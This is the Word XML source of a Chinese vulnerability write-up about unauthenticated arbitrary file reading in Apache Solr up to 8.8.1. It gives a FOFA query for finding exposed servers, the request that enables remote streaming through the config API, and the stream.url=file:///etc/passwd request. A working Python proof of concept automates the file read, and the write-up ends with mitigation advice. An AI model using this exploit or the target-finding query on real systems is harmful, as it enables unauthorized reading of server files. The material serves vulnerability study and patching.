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center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apache Solr 任意文件读取漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">下载后解压，然后把server中的JAR拷贝到example中然后CMD打开bin目录下的solr.cmd，访问 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://ip:8093(默认)" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://ip:8093(默认)</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Apache Solr简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Apache Solr是一个开源的搜索服务，使用Java语言开发，主要基于HTTP和Apache Lucene实现的。它是一个独立的企业级搜索应用服务器，它对外提供类似于Web-service的API接口。用户可以通过http请求，向搜索引擎服务器提交一定格式的XML文件，生成索引；也可以通过Http Get操作提出查找请求，并得到XML格式的返回结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>一、漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache Sol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在任意文件读取漏洞攻击者可以在未授权的情况下获取目标服务器敏感文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>二、漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache Solr &lt;= 8.8.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>三、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>FOFA语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>app="apache-Solr"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2622550"/>
            <wp:effectExtent l="0" t="0" r="508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262255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rPr>
        <w:t>访问 Solr Admin 管理员页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="252222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522220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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"http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&amp;wt=json" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&amp;wt=json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2825115"/>
            <wp:effectExtent l="0" t="0" r="508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7960" cy="2825115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>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发送数据直接访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/solr/edge_index_shard1_replica1/config</w:t>
      </w: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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>edge_index_shard1_replica1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个是获取到的name,后面接上config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap w:val="0"/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2830830"/>
            <wp:effectExtent l="0" t="0" r="6350"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6690" cy="2830830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> /solr/edge_index_shard1_replica1/debug/dump?param=ContentStreams </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap w:val="0"/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2375535"/>
            <wp:effectExtent l="0" t="0" r="6350"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266690" cy="2375535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后再抓包，在下面添加 stream.url=file:///etc/passwd   再把GET转换为POST发送</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap w:val="0"/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1720215"/>
            <wp:effectExtent l="0" t="0" r="6350"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6690" cy="1720215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>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成功读取passwd文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap w:val="0"/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2686685"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1079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74310" cy="2686685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap w:val="0"/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:textAlignment w:val="auto"/>
      </w:pP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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#!/usr/bin/python</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coding: UTF-8</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import requests</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host="http://192.168.1.79:8081/"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if host[-1]=='/':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host=host[:-1]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def get_core(host):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url=host+'/solr/admin/cores?indexInfo=false&amp;wt=json'</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core_data=requests.get(url,timeout=3).json()</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if core_data['status']:</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core=core_data['status'].keys()[0]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jsonp_data={"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":'true'}}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requests.post(url=host+"/solr/%s/config"%core,json=jsonp_data)</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result_data=requests.post(url=host+'/solr/%s/debug/dump?param=ContentStreams'%core,data={"stream.url":"file:///etc/passwd"}).json()</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if result_data['streams']:</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print result_data['streams'][0]['stream']</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else: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exit("不存在此漏洞")</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get_core(host)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32" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="288" w:lineRule="atLeast"/>
        <w:ind w:left="0"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修复建议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由于官方拒绝修复该漏洞，因此请将Apache solr在内网中启动，若需要在公网中使用，需要限制访问ip。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64" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="288" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="both"/>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1A63"/>
    <w:rsid w:val="0FB47DEB"/>
    <w:rsid w:val="11A454D7"/>
    <w:rsid w:val="1D9019EE"/>
    <w:rsid w:val="1DA35164"/>
    <w:rsid w:val="20440736"/>
    <w:rsid w:val="23DA3B43"/>
    <w:rsid w:val="2B1A467A"/>
    <w:rsid w:val="2C410F84"/>
    <w:rsid w:val="2D624F79"/>
    <w:rsid w:val="2DEC5ACF"/>
    <w:rsid w:val="320E50D5"/>
    <w:rsid w:val="3A3E3137"/>
    <w:rsid w:val="3C1F4FC0"/>
    <w:rsid w:val="3F44761D"/>
    <w:rsid w:val="428158A7"/>
    <w:rsid w:val="429D5E06"/>
    <w:rsid w:val="46C50AB5"/>
    <w:rsid w:val="48E618FC"/>
    <w:rsid w:val="48F71F96"/>
    <w:rsid w:val="4D4D789E"/>
    <w:rsid w:val="519D7C15"/>
    <w:rsid w:val="54051C26"/>
    <w:rsid w:val="54B55AFE"/>
    <w:rsid w:val="555F6AF1"/>
    <w:rsid w:val="55C17697"/>
    <w:rsid w:val="58113282"/>
    <w:rsid w:val="5AA50769"/>
    <w:rsid w:val="6745389A"/>
    <w:rsid w:val="677245C7"/>
    <w:rsid w:val="6DDA2529"/>
    <w:rsid w:val="6E6F4867"/>
    <w:rsid w:val="6FA96FE6"/>
    <w:rsid w:val="71492FCA"/>
    <w:rsid w:val="734F47C9"/>
    <w:rsid w:val="78E9285F"/>
    <w:rsid w:val="7A1865D5"/>
    <w:rsid w:val="7AB31D12"/>
    <w:rsid w:val="7D720944"/>
    <w:rsid w:val="7F61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2021-03-18T08:39:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-23T14:06:26Z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